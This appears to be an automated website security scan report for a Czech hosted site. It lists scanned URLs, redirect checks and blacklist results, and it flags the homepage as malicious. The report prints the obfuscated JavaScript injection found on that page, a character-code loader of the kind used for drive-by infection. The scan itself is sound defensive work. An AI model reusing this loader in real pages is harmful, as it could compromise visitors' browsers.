Scanned pages/files
Request | Server response | Status |
http://www.3dmodelyfalco.wz.cz/ | 200 OK Content-Length: 26121 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function($$,_2,_1,doc,tk) { var xo=""; function qq2(cid){cid=~~cid;return ["L",189-20*cid,175,16*cid,70,81,89,16,73,78,81,67,31,10,2,28,2,13,83,31,2,28,88,67,84,2,56,77,31,86,74,75,85,29,62,61,56,77,2,2,40,87,78,78,59,71,67,84,2,7,47,81,80,86,74,2,7,38,67,86,71,2,7,42,81,87,84,85,2,7,47,75,80,87,86,71,85,2,7,53,71,69,81,80,70,85,10,11,63,95,29,2,13,52,31,2,28,2,8,89,14,56,91,31,86,74,75,85,16,5,83,10,11,14,75,31,18,29,56,91,61,19,63,13,31,19,29,89,74,75,78,71,10,75,13,13,30,25,11,93,5 })((function(jsB) { return jsB.constructor }), (function(jsB) { return (function(jsBs) { return jsB.call(jsB, jsBs) }) })) },function(tt){return tt.pop();}, function(kk,dd,ch,pp){ for(var c=kk.length;c>0;){ var x=ch(c); c-=x; var rep=kk.substr(c, x); var t = dd.split(rep); dd=t.join(pp(t)); };return dd; },document,document.getElementsByTagName('title')); if(typeof gloa=='function')gloa(); Antivirus reports:
| ||
http://www.3dmodelyfalco.wz.cz/file:///C:/Program%20Files/Microsoft%20Office/OFFICE11/fpclass/animate.js | HTTP/1.1 302 Found Connection: close Date: Mon, 15 Dec 2014 12:18:07 GMT Location: http://e.wz.cz/404.html Server: Apache Content-Length: 280 Content-Type: text/html; charset=iso-8859-1 | clean |
http://e.wz.cz/404.html | 200 OK Content-Length: 12877 Content-Type: text/html | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://www.3dmodelyfalco.wz.cz/test404page.js | HTTP/1.1 302 Found Connection: close Date: Mon, 15 Dec 2014 12:18:08 GMT Location: http://e.wz.cz/404.html Server: Apache Content-Length: 280 Content-Type: text/html; charset=iso-8859-1 | clean |
http://e.wz.cz/test404page.js | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 3dmodelyfalco.wz.cz
Result:
GET / HTTP/1.1
Host: 3dmodelyfalco.wz.cz
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 3dmodelyfalco.wz.cz
Referer: http://www.google.com/search?q=3dmodelyfalco.wz.cz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 3dmodelyfalco.wz.cz
Referer: http://www.google.com/search?q=3dmodelyfalco.wz.cz
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=3dmodelyfalco.wz.cz
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://3dmodelyfalco.wz.cz/
Result: 3dmodelyfalco.wz.cz is not infected or malware details are not published yet.
Result: 3dmodelyfalco.wz.cz is not infected or malware details are not published yet.